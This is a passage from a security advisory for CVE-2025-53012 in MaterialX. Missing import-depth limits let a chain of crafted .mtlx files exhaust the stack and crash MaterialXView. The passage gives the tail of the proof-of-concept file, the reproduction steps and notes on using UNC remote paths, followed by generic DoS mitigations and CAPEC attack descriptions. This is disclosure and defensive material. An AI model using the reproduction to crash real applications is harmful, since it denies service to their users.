\u003copen_pbr_surface name=\"open_pbr_surface_surfaceshader\" type=\"surfaceshader\"\u003e\n    \u003cinput name=\"base_color\" type=\"color3\" value=\"0.912, 0.914, 0.920\" /\u003e\n    \u003cinput name=\"base_metalness\" type=\"float\" value=\"1.0\" /\u003e\n    \u003cinput name=\"specular_color\" type=\"color3\" value=\"0.970, 0.979, 0.988\" /\u003e\n    \u003cinput name=\"specular_roughness\" type=\"float\" value=\"0.2\" /\u003e\n    \u003cinput name=\"specular_roughness_anisotropy\" type=\"float\" value=\"0.9\" /\u003e\n  \u003c/open_pbr_surface\u003e\n\u003c/materialx\u003e\n```\n8. Load the MaterialX file in MaterialXView\n9. Notice that the viewer doesn\u0027t respond anymore. After some minutes, notice that the viewer crashes, demonstrating the Stack Exhaustion\n\nNote: by consulting the Windows `Event Viewer`, it is possible to examine the application crash, verifying that it is indeed crashing with a `STATUS_STACK_OVERFLOW (0xc00000fd)`.\n\n### Impact\n\nAn attacker exploiting this vulnerability would be able to intentionally stall and crash an application reading MaterialX files controlled by them.\n\nIn Windows, the attack complexity is lower, since the malicious MaterialX file can reference remote paths via the UNC notation. However, the attack would work in other systems as well, provided that the attacker can write an arbitrary amount of MaterialX files (implementing the chain) in the local file system.",
  "id": "GHSA-qc2h-74x3-4v3w",
  "modified": "2025-08-01T18:36:16Z",
  "published": "2025-07-31T19:37:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-qc2h-74x3-4v3w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53012"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/MaterialX/pull/2233/commits/6182c07467297416a30d148ab531d81198686dc5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AcademySoftwareFoundation/MaterialX"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/MaterialX/releases/tag/v1.39.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MaterialX Lack of MTLX Import Depth Limit Leads to DoS (Denial-Of-Service) Via Stack Exhaustion"
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.